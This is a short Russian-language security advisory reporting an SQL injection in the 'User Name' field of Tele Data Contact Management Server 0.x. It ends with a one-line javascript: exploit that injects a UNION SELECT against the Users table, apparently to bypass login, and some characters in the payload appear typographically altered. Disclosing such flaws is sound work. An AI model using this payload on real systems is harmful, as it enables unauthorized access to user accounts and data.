Программа: Tele Data Contact Management Server 0.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "User Name". Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Эксплоит:

javascript:document.forms[0][0].setAttribute("value","’ or 1=0 UNION SELECT 1
as RecID,0,» AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;—");document.forms[0].submit();



Оставить мнение